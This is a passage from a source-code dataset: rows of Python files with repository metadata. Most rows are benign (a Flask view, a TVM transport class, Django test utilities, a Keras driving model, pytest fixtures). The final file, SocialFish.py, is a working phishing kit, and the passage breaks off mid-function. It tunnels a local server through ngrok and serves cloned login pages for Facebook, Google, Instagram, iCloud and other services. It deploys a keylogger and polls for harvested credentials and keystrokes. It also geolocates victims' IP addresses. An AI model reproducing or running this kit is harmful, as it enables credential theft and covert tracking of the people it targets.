hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7f46b24b1fad22d6f5db57d3217da27c6a184bdb | 1,120 | py | Python | cwlab/web_app/main.py | krini-project/CWLab | 7e75cf9c4d00a9defb03802b358d40902f1ffd59 | [
"Apache-2.0"
] | null | null | null | cwlab/web_app/main.py | krini-project/CWLab | 7e75cf9c4d00a9defb03802b358d40902f1ffd59 | [
"Apache-2.0"
] | null | null | null | cwlab/web_app/main.py | krini-project/CWLab | 7e75cf9c4d00a9defb03802b358d40902f1ffd59 | [
"Apache-2.0"
] | null | null | null | import sys
import os
from flask import render_template, jsonify, redirect, flash, url_for, request
from flask_login import current_user
from werkzeug.urls import url_parse
from flask import current_app as app
from cwlab.users.manage import load_user
from json import dumps
from cwlab.log import handle_known_error, handle_unknown_error
@app.route('/', methods=['GET', 'POST'])
@app.route('/home/', methods=['GET', 'POST'])
@app.route('/main/', methods=['GET', 'POST'])
def main():
    """Render the main page.

    When user management is enabled and a user is authenticated, the
    template receives their username and permission level; otherwise the
    identity fields are None.
    """
    logged_in = bool(app.config["ENABLE_USERS"] and current_user.is_authenticated)
    if logged_in:
        user = load_user(current_user.get_id())
        username, user_level = user.username, user.level
    else:
        username = user_level = None
    template_context = {
        'login_enabled': app.config["ENABLE_USERS"],
        'logged_in': logged_in,
        'username': username,
        'user_level': user_level,
        'auto_refresh_interval': app.config["WEB_AUTO_REFRESH_INTERVAL"],
        'read_max_chars_from_file': app.config["READ_MAX_CHARS_FROM_FILE"],
    }
    return render_template('main.html', **template_context)
418f8bdbb27ab3c7b68e89ad042008afe47432d3 | 2,929 | py | Python | python/tvm/micro/transport/wakeup.py | zhenlohuang/tvm | fd2e6d17120a79533852c6bb705429d9c7bc286b | [
"Apache-2.0"
] | 90 | 2019-01-26T00:38:49.000Z | 2022-03-11T23:12:34.000Z | python/tvm/micro/transport/wakeup.py | zhenlohuang/tvm | fd2e6d17120a79533852c6bb705429d9c7bc286b | [
"Apache-2.0"
] | 91 | 2019-02-27T00:17:01.000Z | 2022-02-21T18:08:21.000Z | python/tvm/micro/transport/wakeup.py | zhenlohuang/tvm | fd2e6d17120a79533852c6bb705429d9c7bc286b | [
"Apache-2.0"
] | 41 | 2019-01-28T14:37:03.000Z | 2022-03-31T03:58:57.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Defines an implementation of Transport that uses subprocesses."""
import logging
import time
from . import base
_LOG = logging.getLogger(__name__)
class WakeupTransport(base.Transport):
    """A Transport implementation that waits for a "wakeup sequence" from the remote end.

    All reads and writes are forwarded to ``child_transport``, but the first
    read/write blocks until ``wakeup_sequence`` has been observed in the
    incoming byte stream.
    """

    def __init__(self, child_transport, wakeup_sequence):
        """Parameters
        ----------
        child_transport : Transport
            Underlying transport that actually moves bytes.
        wakeup_sequence : bytes
            Byte sequence that signals the remote side has booted.
        """
        self.child_transport = child_transport
        self.wakeup_sequence = bytes(wakeup_sequence)
        self.wakeup_sequence_buffer = bytearray()
        self.line_start_index = 0
        self.found_wakeup_sequence = False

    def open(self):
        return self.child_transport.open()

    def close(self):
        return self.child_transport.close()

    def timeouts(self):
        return self.child_transport.timeouts()

    def _await_wakeup(self, end_time):
        """Consume bytes until the wakeup sequence is seen; return remaining time."""
        def _time_remaining():
            if end_time is None:
                return None
            return max(0, end_time - time.monotonic())

        if not self.found_wakeup_sequence:
            while self.wakeup_sequence not in self.wakeup_sequence_buffer:
                x = self.child_transport.read(1, _time_remaining())
                self.wakeup_sequence_buffer.extend(x)
                # BUGFIX: compare a 1-byte slice, not x[0]. Indexing bytes in
                # Python 3 yields an int, so the old test
                # `x[0] in (b"\n", b"\xff")` was never true (and raised
                # IndexError when the read returned no data). Slicing is safe
                # for empty reads and compares bytes-to-bytes.
                if x[:1] in (b"\n", b"\xff"):
                    # Log each completed line of boot chatter for debugging.
                    _LOG.debug("%s", self.wakeup_sequence_buffer[self.line_start_index : -1])
                    self.line_start_index = len(self.wakeup_sequence_buffer)

            _LOG.info("remote side woke up!")
            self.found_wakeup_sequence = True
            # Brief grace period so the remote side finishes its banner output.
            time.sleep(0.2)

        return _time_remaining()

    def read(self, n, timeout_sec):
        if not self.found_wakeup_sequence:
            end_time = None if timeout_sec is None else time.monotonic() + timeout_sec
            timeout_sec = self._await_wakeup(end_time)
        return self.child_transport.read(n, timeout_sec)

    def write(self, data, timeout_sec):
        if not self.found_wakeup_sequence:
            end_time = None if timeout_sec is None else time.monotonic() + timeout_sec
            timeout_sec = self._await_wakeup(end_time)
        return self.child_transport.write(data, timeout_sec)
| 36.6125 | 93 | 0.686241 |
9a0fe5a454948769e1a11d721d1c1fa1ed4a35cd | 2,920 | py | Python | django/utils/unittest/util.py | egenerat/gae-django | f12379483cf3917ed3cb46ca5ff0b94daf89fc50 | [
"MIT"
] | 3 | 2016-07-08T23:49:32.000Z | 2018-04-15T22:55:01.000Z | django/utils/unittest/util.py | egenerat/gae-django | f12379483cf3917ed3cb46ca5ff0b94daf89fc50 | [
"MIT"
] | 27 | 2017-02-05T15:57:04.000Z | 2018-04-15T22:57:26.000Z | django/utils/unittest/util.py | egenerat/gae-django | f12379483cf3917ed3cb46ca5ff0b94daf89fc50 | [
"MIT"
] | null | null | null | """Various utility functions."""
# Flag recognized by unittest to omit this module's frames from tracebacks.
__unittest = True

# Longest repr we are willing to show before truncating (in short mode).
_MAX_LENGTH = 80

def safe_repr(obj, short=False):
    """Return ``repr(obj)``, tolerating a broken ``__repr__``.

    If the object's ``__repr__`` raises, fall back to the default
    ``object.__repr__``. When *short* is true, results of ``_MAX_LENGTH``
    characters or more are truncated with a ``' [truncated]...'`` suffix.
    """
    try:
        text = repr(obj)
    except Exception:
        text = object.__repr__(obj)
    if short and len(text) >= _MAX_LENGTH:
        return text[:_MAX_LENGTH] + ' [truncated]...'
    return text
def safe_str(obj):
    """Return ``str(obj)``, falling back to ``object.__str__`` when the
    object's own ``__str__`` raises."""
    try:
        result = str(obj)
    except Exception:
        result = object.__str__(obj)
    return result
def strclass(cls):
    """Return the fully qualified ``module.ClassName`` name of *cls*."""
    return cls.__module__ + "." + cls.__name__
def sorted_list_difference(expected, actual):
    """Finds elements in only one or the other of two, sorted input lists.

    Returns a two-element tuple of lists. The first list contains those
    elements in the "expected" list but not in the "actual" list, and the
    second contains those elements in the "actual" list but not in the
    "expected" list. Duplicate elements in either input list are ignored.

    Both inputs must already be sorted; the walk below relies on that to
    run in a single O(n + m) pass.
    """
    i = j = 0
    missing = []
    unexpected = []
    # NOTE: the loop deliberately relies on IndexError from expected[i] /
    # actual[j] as its termination condition -- when either cursor runs off
    # the end, the remaining tail of the other list is flushed and we stop.
    while True:
        try:
            e = expected[i]
            a = actual[j]
            if e < a:
                # e is missing from actual; skip any duplicates of e.
                missing.append(e)
                i += 1
                while expected[i] == e:
                    i += 1
            elif e > a:
                # a was not expected; skip any duplicates of a.
                unexpected.append(a)
                j += 1
                while actual[j] == a:
                    j += 1
            else:
                # Matching element: advance past duplicates on both sides.
                # The finally block guarantees j advances even if the inner
                # while raises IndexError at the end of `expected`.
                i += 1
                try:
                    while expected[i] == e:
                        i += 1
                finally:
                    j += 1
                    while actual[j] == a:
                        j += 1
        except IndexError:
            # One list exhausted: everything left over is one-sided.
            missing.extend(expected[i:])
            unexpected.extend(actual[j:])
            break
    return missing, unexpected
def unorderable_list_difference(expected, actual, ignore_duplicate=False):
    """Same behavior as sorted_list_difference but
    for lists of unorderable items (like dicts).

    As it does a linear search per item (remove) it
    has O(n*n) performance.

    WARNING: both *expected* and *actual* are mutated in place --
    *expected* is emptied and matched items are removed from *actual*.
    Pass copies if the callers still need the originals.
    """
    missing = []
    unexpected = []
    while expected:
        item = expected.pop()
        try:
            actual.remove(item)
        except ValueError:
            # Not present in actual at all.
            missing.append(item)
        if ignore_duplicate:
            # Strip every remaining duplicate of this item from both lists;
            # ValueError from .remove() signals there are none left.
            for lst in expected, actual:
                try:
                    while True:
                        lst.remove(item)
                except ValueError:
                    pass
    if ignore_duplicate:
        # De-duplicate the leftover unexpected items the same way.
        while actual:
            item = actual.pop()
            unexpected.append(item)
            try:
                while True:
                    actual.remove(item)
            except ValueError:
                pass
        return missing, unexpected
    # anything left in actual is unexpected
    return missing, actual
| 29.2 | 77 | 0.496233 |
f2f1cf347e159cd360c025c1625f867002cddd7d | 3,323 | py | Python | model.py | xmeng17/Behavioral-Cloning | 713e9c539dacc8ea1512c2b1c43fd46b63c8c0b9 | [
"MIT"
] | null | null | null | model.py | xmeng17/Behavioral-Cloning | 713e9c539dacc8ea1512c2b1c43fd46b63c8c0b9 | [
"MIT"
] | null | null | null | model.py | xmeng17/Behavioral-Cloning | 713e9c539dacc8ea1512c2b1c43fd46b63c8c0b9 | [
"MIT"
] | null | null | null | from keras.models import Sequential
from keras.layers import Dense, Flatten, Dropout, Lambda, Cropping2D, Convolution2D,MaxPooling2D
from keras.layers.advanced_activations import LeakyReLU
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
import cv2
import numpy as np
import csv
# --- Training configuration -------------------------------------------------
path_prefix = 'data/'  # root folder holding driving_log.csv and recorded images
data_range = None  # optional cap on the number of log rows (None = use all)
verbose = 1  # Keras fit_generator verbosity level
batch_size = 64  # log rows per batch (images are doubled by horizontal flipping)
epochs = 7  # training epochs
dropout_rate = 0.2  # dropout after each conv block and the first dense layer
leaky=0.1  # LeakyReLU negative-slope coefficient
def get_train_valid_arr(path):
    """Read the driving log at *path* (skipping the header row) and split
    the rows 80/20 into training and validation lists."""
    with open(path) as f:
        reader = csv.reader(f)
        next(reader)  # discard the CSV header row
        rows = list(reader)
    # data_range is None by default, so this slice keeps every row.
    rows = rows[:data_range]
    train_rows, valid_rows = train_test_split(rows, test_size=0.2)
    return train_rows, valid_rows
def generator(arr):
    """Infinite batch generator over driving-log rows.

    For every log row the center-camera image and its steering angle are
    yielded, plus a horizontally flipped copy with the negated angle, so
    each batch contains up to 2 * batch_size samples. Intended for
    Keras ``fit_generator``.
    """
    num = len(arr)
    while True:
        # Re-shuffle the row order at the start of every epoch.
        shuffle(arr)
        for i in range(0, num, batch_size):
            batch_lines = arr[i:i + batch_size]
            images = []
            steerings = []
            for line in batch_lines:
                # Column 0 = center image path, column 3 = steering angle.
                center_path = line[0]
                steering = float(line[3])
                center_real_path = path_prefix + center_path
                image = cv2.imread(center_real_path)
                #image = cv2.imread(center_path)
                images.append(image)
                steerings.append(steering)
                # Augmentation: mirror the frame and negate the steering.
                image_flip=np.fliplr(image)
                images.append(image_flip)
                steerings.append(-steering)
            X_train = np.array(images)
            y_train = np.array(steerings)
            # sklearn.utils.shuffle returns the two arrays shuffled in unison.
            yield shuffle(X_train, y_train)
def model(train_batch_num, valid_batch_num, train_generator, valid_generator):
    """Build, train, and save the behavioral-cloning CNN as model.h5.

    Architecture: crop + normalize, three conv/LeakyReLU/dropout/maxpool
    blocks (16, 24, 32 filters), then two 512-unit dense layers and a
    single linear output predicting the steering angle (MSE loss, Adam).
    """
    model = Sequential()
    # Remove 45 px of sky and 15 px of hood, then scale pixels to [-0.5, 0.5].
    model.add(Cropping2D(cropping=((45, 15), (0, 0)), input_shape=(160, 320, 3)))
    model.add(Lambda(lambda x: x / 255.0 - 0.5))
    relu1=LeakyReLU(alpha=leaky)
    model.add(Convolution2D(16,(5,5),strides=(1,1),padding='valid'))
    model.add(relu1)
    model.add(Dropout(dropout_rate))
    model.add(MaxPooling2D((2,2),strides=(2,2)))
    relu2 = LeakyReLU(alpha=leaky)
    model.add(Convolution2D(24, (5, 5), strides=(1, 1), padding='valid'))
    model.add(relu2)
    model.add(Dropout(dropout_rate))
    model.add(MaxPooling2D((2, 2), strides=(2, 2)))
    relu3 = LeakyReLU(alpha=leaky)
    model.add(Convolution2D(32, (5, 5), strides=(1, 1), padding='valid'))
    model.add(relu3)
    model.add(Dropout(dropout_rate))
    model.add(MaxPooling2D((2, 2), strides=(2, 2)))
    model.add(Flatten())
    model.add(Dense(512,activation='relu'))
    model.add(Dropout(dropout_rate))
    model.add(Dense(512,activation='relu'))
    # Single linear unit: regression output for the steering angle.
    model.add(Dense(1))
    model.compile(optimizer='adam', loss='mse')
    model.fit_generator(train_generator, steps_per_epoch=train_batch_num, epochs=epochs, verbose=verbose,
                        validation_data=valid_generator, validation_steps=valid_batch_num)
    model.save('model.h5')
# Script entry: load the log, size the batch counts, and train the model.
train_arr, valid_arr = get_train_valid_arr(path_prefix + 'driving_log.csv')
train_batch_num = int(len(train_arr) / batch_size)
valid_batch_num = int(len(valid_arr) / batch_size)
train_generator = generator(train_arr)
valid_generator = generator(valid_arr)
model(train_batch_num, valid_batch_num, train_generator, valid_generator)
'''x_train,y_train=next(train_generator)
print(x_train[0])
print(y_train[0])'''
| 32.262136 | 105 | 0.66145 |
80dff869f781884a8f6cb78082605b4b8f9ba588 | 507 | py | Python | mmkitjournal/views.py | einsfr/mmkit2 | 68ff9b28faadf8b57c845601e1fdf01b961f6936 | [
"MIT"
] | null | null | null | mmkitjournal/views.py | einsfr/mmkit2 | 68ff9b28faadf8b57c845601e1fdf01b961f6936 | [
"MIT"
] | 7 | 2016-07-15T13:35:22.000Z | 2016-07-29T09:42:23.000Z | mmkitjournal/views.py | einsfr/mmkit2 | 68ff9b28faadf8b57c845601e1fdf01b961f6936 | [
"MIT"
] | null | null | null | from rest_framework import generics
from rest_framework.filters import DjangoFilterBackend
from mmkitjournal.models import ActivityRecord
from mmkitjournal import serializers
from . import filters
class ActivityRecordView(generics.ListAPIView):
    """Read-only, filterable list endpoint for activity journal records."""
    # select_related avoids an extra query per row for the three FK columns.
    queryset = ActivityRecord.objects.select_related('message_class', 'user', 'content_type').all()
    serializer_class = serializers.ActivityRecordListSerializer
    filter_backends = (DjangoFilterBackend, )
    filter_class = filters.ActivityRecordFilter
| 33.8 | 99 | 0.82643 |
4340002fcbcff9a0ce508542aeca89c861463454 | 2,469 | py | Python | osf_tests/conftest.py | hmoco/osf.io | a02869f9b5c198bafae7cea0c216674bbcba62f7 | [
"Apache-2.0"
] | 1 | 2015-10-02T18:35:53.000Z | 2015-10-02T18:35:53.000Z | osf_tests/conftest.py | hmoco/osf.io | a02869f9b5c198bafae7cea0c216674bbcba62f7 | [
"Apache-2.0"
] | 4 | 2016-05-13T14:24:16.000Z | 2017-03-30T15:28:31.000Z | osf_tests/conftest.py | hmoco/osf.io | a02869f9b5c198bafae7cea0c216674bbcba62f7 | [
"Apache-2.0"
] | null | null | null | import logging
import pytest
from faker import Factory
from framework.django.handlers import handlers as django_handlers
from framework.flask import rm_handlers
from website import settings
from website.app import init_app, patch_models
from website.project.signals import contributor_added
from website.project.views.contributor import notify_added_contributor
# Silence some 3rd-party logging and some "loud" internal loggers
SILENT_LOGGERS = [
    'api.caching.tasks',
    'factory.generate',
    'factory.containers',
    'framework.analytics',
    'framework.auth.core',
    'framework.celery_tasks.signals',
    'website.app',
    'website.archiver.tasks',
    'website.mails',
    'website.notifications.listeners',
    'website.search.elastic_search',
    'website.search_migration.migrate',
    'website.util.paths',
    'requests_oauthlib.oauth2_session',
    'raven.base.Client',
    'raven.contrib.django.client.DjangoClient',
]
# Raise each listed logger's threshold so only CRITICAL records pass through.
for logger_name in SILENT_LOGGERS:
    logging.getLogger(logger_name).setLevel(logging.CRITICAL)
@pytest.fixture(autouse=True, scope='session')
def patched_models():
    """Apply model patches once per test session, before any test runs."""
    patch_models(settings)
# NOTE: autouse so that ADDONS_REQUESTED gets set on website.settings
@pytest.fixture(autouse=True, scope='session')
def app():
    """Session-wide Flask test app with Django handlers removed."""
    try:
        test_app = init_app(routes=True, set_backends=False)
    except AssertionError:  # Routes have already been set up
        test_app = init_app(routes=False, set_backends=False)
    # Strip the Django request handlers that the production app installs.
    rm_handlers(test_app, django_handlers)
    test_app.testing = True
    return test_app
# pytest.yield_fixture is deprecated; a plain pytest.fixture supports yield.
@pytest.fixture()
def request_context(app):
    """Push a Flask test request context for the test and pop it afterwards."""
    context = app.test_request_context(headers={
        'Remote-Addr': '146.9.219.56',
        'User-Agent': 'Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.4.1) Gecko/20020518 Netscape6/6.2.3'
    })
    context.push()
    yield context
    context.pop()
# Map of blinker signal -> receivers to detach while tests run.
DISCONNECTED_SIGNALS = {
    # disconnect notify_add_contributor so that add_contributor does not send "fake" emails in tests
    contributor_added: [notify_added_contributor]
}
@pytest.fixture(autouse=True)
def disconnected_signals():
    """Detach every receiver listed in DISCONNECTED_SIGNALS for the test."""
    for signal, receivers in DISCONNECTED_SIGNALS.items():
        for receiver in receivers:
            signal.disconnect(receiver)
@pytest.fixture(autouse=True)
def patched_settings():
    """Patch settings for tests"""
    settings.ENABLE_EMAIL_SUBSCRIPTIONS = False
    # Minimal bcrypt work factor: keeps password hashing fast in tests.
    settings.BCRYPT_LOG_ROUNDS = 1
@pytest.fixture()
def fake():
    """Return a Faker factory for generating random test data."""
    return Factory.create()
| 29.392857 | 107 | 0.737546 |
400e7f8e473cb6f9c598b19e62a6ecd0fb72978d | 18,651 | py | Python | SocialFish.py | Jena2000/SocialFish | c4ab72c1e12d0c00845620b4808d2145a7f98a87 | [
"BSD-3-Clause"
] | 198 | 2018-03-26T17:34:44.000Z | 2022-02-26T15:18:31.000Z | SocialFish.py | Jena2000/SocialFish | c4ab72c1e12d0c00845620b4808d2145a7f98a87 | [
"BSD-3-Clause"
] | 88 | 2018-03-30T16:42:58.000Z | 2018-10-28T04:42:02.000Z | SocialFish.py | Jena2000/SocialFish | c4ab72c1e12d0c00845620b4808d2145a7f98a87 | [
"BSD-3-Clause"
] | 115 | 2018-04-09T04:30:56.000Z | 2022-03-31T16:26:53.000Z | #!/usr/bin/python3
#-*- coding: utf-8 -*-
# SOCIALFISH v3.0
# by: An0nUD4Y
#
###########################
from time import sleep
from sys import stdout, exit, argv
from os import system, path
from distutils.dir_util import copy_tree
import multiprocessing
from urllib.request import urlopen, quote, unquote
from platform import system as systemos, architecture
from wget import download
import re
import json
from subprocess import check_output
# ANSI color escape codes used throughout the console UI.
RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m'

def connected(host='http://duckduckgo.com'):  # Quick network-connectivity probe.
    """Return True if *host* can be fetched, False otherwise.

    Fixes over the original: the response is closed instead of leaked,
    a timeout bounds the probe so startup cannot hang, and the bare
    ``except:`` is narrowed to ``Exception``.
    """
    try:
        with urlopen(host, timeout=10):
            return True
    except Exception:
        return False
if connected() == False: # If there is no network connection, show an error banner and abort.
    print ('''
 ....._____....... ____ ____ ____ _ ____ _ ____ _ ____ _ _
/ \/| [__ | | | | |__| | |___ | [__ |__|
\o__ /\| ___] |__| |___ | | | |___ | | ___] | |
\|
{0}[{1}!{0}]{1} Network error. Verify your connection.\n
'''.format(RED, DEFAULT))
    exit(0)
def checkNgrok(): # Download the ngrok binary into Server/ if it is not already present.
    """Ensure Server/ngrok exists, downloading the right build for this
    OS/architecture (ARM zip on Android/Termux) and unpacking it."""
    if path.isfile('Server/ngrok') == False:
        print('[*] Downloading Ngrok...')
        # `uname -a` mentioning Android implies Termux -> ARM build.
        if 'Android' in str(check_output(('uname', '-a'))):
            filename = 'ngrok-stable-linux-arm.zip'
        else:
            ostype = systemos().lower()
            if architecture()[0] == '64bit':
                filename = 'ngrok-stable-{0}-amd64.zip'.format(ostype)
            else:
                filename = 'ngrok-stable-{0}-386.zip'.format(ostype)
        url = 'https://bin.equinox.io/c/4VmDzA7iaHb/' + filename
        download(url)
        # Unpack, move the binary into place, and clean up the archive.
        system('unzip ' + filename)
        system('mv ngrok Server/ngrok')
        system('rm -Rf ' + filename)
        system('clear')
# Run the check once at import time so the binary is ready before the menu.
checkNgrok()
def end(): # Farewell banner printed when SocialFish exits (Ctrl-C handler).
    system('clear')
    print ('''
 S O C I A L{2}
 |\ \ \ \ \ \ \ \ __ ___
 | \ \ \ \ \ \ \ \ | O~-_ _-~~ ~~-_
 | >----|-|-|-|-|-|-|--| __/ / {1}DON'T{2} )
 | / / / / / / / / |__\ < {1}FORGET{2} )
 |/ / / / / / / / \_ {1}ME !{2} _)
 {1}F I S H{2} ~--___--~
 {0}NOW WITH LIVE VICTIM ATTACK INFORMATION ]
 {0}A KEYLOGGER IS DEPLOYED FOR YOU, TO CAPTURE EVERY KEYSTROKE ]
 [ {0} Some more phising pages have been added in script. For a better Attack]
 [ {0} WELCOME TO SOCIALFISH V3.0 by-An0nUD4Y]\n {1}'''.format(GREEN, DEFAULT, CYAN))
def loadModule(module):
    """Print a small banner announcing which phishing module was selected."""
    print ('''{0}
 _.-=-._ .-,
 .' "-.,' /
 ( AnonUD4Y _. <
 `=.____.=" `._\\
 [{1}*{0}]{1} %s module loaded. Building site...{0}'''.format(CYAN, DEFAULT) % module)
def runPhishing(page, option2): # Install the selected phishing page into the web root.
    """Reset Server/www and deploy the template chosen by the user.

    ``page`` names the target site; ``option2`` picks a variant for the
    sites that offer more than one template. Unknown combinations leave
    the web root with only the keylogger support files.
    """
    # Wipe the web root and (re)deploy the keylogger support files.
    system('rm -Rf Server/www/*.* && touch Server/www/usernames.txt && touch Server/www/ip.txt && cp WebPages/ip.php Server/www/ && cp WebPages/KeyloggerData.txt Server/www/ && cp WebPages/keylogger.js Server/www/ && cp WebPages/keylogger.php Server/www/')
    # Templates keyed by (site, variant).
    variant_templates = {
        ('Facebook', '1'): 'fb_standard',
        ('Facebook', '2'): 'fb_advanced_poll',
        ('Facebook', '3'): 'fb_security_fake',
        ('Facebook', '4'): 'fb_messenger',
        ('Google', '1'): 'google_standard',
        ('Google', '2'): 'google_advanced_poll',
        ('Google', '3'): 'google_advanced_web',
        ('Instagram', '1'): 'Instagram_web',
        ('Instagram', '2'): 'Instagram_autoliker',
        ('VK', '1'): 'VK',
        ('VK', '2'): 'VK_poll_method',
    }
    # Sites with a single template; any option2 value is accepted.
    single_templates = {
        'LinkedIn': 'linkedin',
        'GitHub': 'GitHub',
        'StackOverflow': 'stackoverflow',
        'WordPress': 'wordpress',
        'Twitter': 'twitter',
        'Snapchat': 'Snapchat_web',
        'Yahoo': 'yahoo_web',
        'Twitch': 'twitch',
        'Microsoft': 'live_web',
        'Steam': 'steam',
        'iCloud': 'iCloud',
    }
    folder = variant_templates.get((page, option2)) or single_templates.get(page)
    if folder is not None:
        copy_tree("WebPages/%s/" % folder, "Server/www/")
# Logging is on by default; pass --nolog on the command line to disable it.
didBackground = True
logFile = None
for arg in argv:
    if arg=="--nolog": # If present - don't write log.txt
        didBackground = False
if didBackground:
    # NOTE(review): the file handle is never flushed or closed explicitly;
    # entries may be lost on an abrupt exit.
    logFile = open("log.txt", "w")
def log(ctx): # Print *ctx* and, when logging is enabled, append it to log.txt
    """Echo *ctx* to the console; write a color-code-stripped copy to the log."""
    if didBackground: # if didBackground == True, write
        logFile.write(ctx.replace(RED, "").replace(WHITE, "").replace(CYAN, "").replace(GREEN, "").replace(DEFAULT, "") + "\n")
    print(ctx)
def waitCreds():
    """Poll the drop files written by the phishing pages and log anything found.

    Watches usernames.txt (captured credentials), ip.txt (victim IP, which is
    enriched via the ipinfo.io API), and KeyloggerData.txt (keystrokes). Each
    file is truncated after its contents are logged.

    NOTE(review): this is a busy-wait loop with no sleep -- it pins a CPU core
    while idle.
    """
    print("{0}[{1}*{0}]{1} Hi Hacker Everything has been completed.............. Start HAcking ".format(RED, DEFAULT))
    print('''{0}
 _.-=-._ .-,
 .' "-.,' /
 ( AnonUD4Y_ ~.<
 `=.____.=" `._\\
 [{1}*{0}]{1} WE HAVE ALSO DEPLOYED A KEYLOGGER. .
 [{1}*{0}]{1} YOU WILL GET VICTIM'S DEVICES INFO.{0}'''.format(CYAN, DEFAULT))
    print(" {0}[{1}*{0}]{1} Waiting for credentials//Pressed keys//Victim's device info... \n".format(RED, DEFAULT))
    while True:
        # Captured credentials posted by the phishing page.
        with open('Server/www/usernames.txt') as creds:
            lines = creds.read().rstrip()
            if len(lines) != 0:
                log('======================================================================'.format(RED, DEFAULT))
                log(' {0}[ CREDENTIALS FOUND ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
                system('rm -rf Server/www/usernames.txt && touch Server/www/usernames.txt')
                log('======================================================================'.format(RED, DEFAULT))
                log(' {0}***** HOPE YOU ARE ENJOYING. SO PLEASE MAKE IT MORE POPULAR *****{1}\n {0}{1}'.format(RED, DEFAULT))
        creds.close()
        # Victim IP written by ip.php; geolocate it via the ipinfo.io API.
        with open('Server/www/ip.txt') as creds:
            lines = creds.read().rstrip()
            if len(lines) != 0:
                ip = re.match('Victim Public IP: (.*?)\n', lines).group(1)
                resp = urlopen('https://ipinfo.io/%s/json' % ip)
                ipinfo = json.loads(resp.read().decode(resp.info().get_param('charset') or 'utf-8'))
                # 'bogon' means a private/reserved address with no geo data.
                if 'bogon' in ipinfo:
                    log('======================================================================'.format(RED, DEFAULT))
                    log(' \n{0}[ VICTIM IP BONUS ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
                else:
                    # ipinfo 'loc' field is "latitude,longitude".
                    matchObj = re.match('^(.*?),(.*)$', ipinfo['loc'])
                    latitude = matchObj.group(1)
                    longitude = matchObj.group(2)
                    log('======================================================================'.format(RED, DEFAULT))
                    log(' \n{0}[ VICTIM INFO FOUND ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
                    log(' \n{0}Longitude: %s \nLatitude: %s{1}'.format(GREEN, DEFAULT) % (longitude, latitude))
                    log(' \n{0}ISP: %s \nCountry: %s{1}'.format(GREEN, DEFAULT) % (ipinfo['org'], ipinfo['country']))
                    log(' \n{0}Region: %s \nCity: %s{1}'.format(GREEN, DEFAULT) % (ipinfo['region'], ipinfo['city']))
                system('rm -rf Server/www/ip.txt && touch Server/www/ip.txt')
                log('======================================================================'.format(RED, DEFAULT))
        creds.close()
        # Keystrokes captured by keylogger.js/keylogger.php.
        with open('Server/www/KeyloggerData.txt') as creds:
            lines = creds.read().rstrip()
            if len(lines) != 0:
                log('______________________________________________________________________'.format(RED, DEFAULT))
                log(' {0}[ GETTING PRESSED KEYS ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
                system('rm -rf Server/www/KeyloggerData.txt && touch Server/www/KeyloggerData.txt')
                log('______________________________________________________________________'.format(RED, DEFAULT))
        creds.close()
def runPEnv(): # Interactive menu: banner, PHP check, disclaimer, then page selection.
    """Show the startup banner, verify PHP is installed, require the user to
    accept the educational-use disclaimer, then dispatch the chosen phishing
    module to runPhishing()."""
    system('clear')
    print (''' {2}-{1} An0nUD4Y {2}|{1} An0nUD4Y {2}|{1} An0nUD4Y {2}- INDIA
 . . .
 . ' . ' '
 ' ' ' ' '
 ███████ ████████ ███████ ██ ███████ ██ ███████ ██ ███████ ██ ██
 ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
 ███████ ██ ██ ██ ██ ███████ ██ █████ ██ ███████ ███████
 ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
 ███████ ████████ ███████ ██ ██ ██ ███████ ██ ██ ███████ ██ ██
 . ' '....' ..'. ' .
 ' . . ' ' ' {1}v3.0{2}
 ' . . . . . '. .' ' .
 ' ' '. ' {1}Updated_By--> AnonUD4Y_{2}
 _________________________________________________________________________________
 {0}[ NOW WITH LIVE VICTIM ATTACK INFORMATION ]
 {0}A KEYLOGGER WILL BE DEPLOYED FOR YOU, TO CAPTURE EVERY KEYSTROKE ]
 _________________________________________________________________________________
 {1}'''.format(GREEN, DEFAULT, CYAN))
    # Cosmetic progress bar (purely visual, ~1 second total).
    for i in range(101):
        sleep(0.01)
        stdout.write("\r{0}[{1}*{0}]{1} Preparing environment... %d%%".format(CYAN, DEFAULT) % i)
        stdout.flush()
    print ("\n\n{0}[{1}*{0}]{1} Searching for PHP installation... ".format(CYAN, DEFAULT))
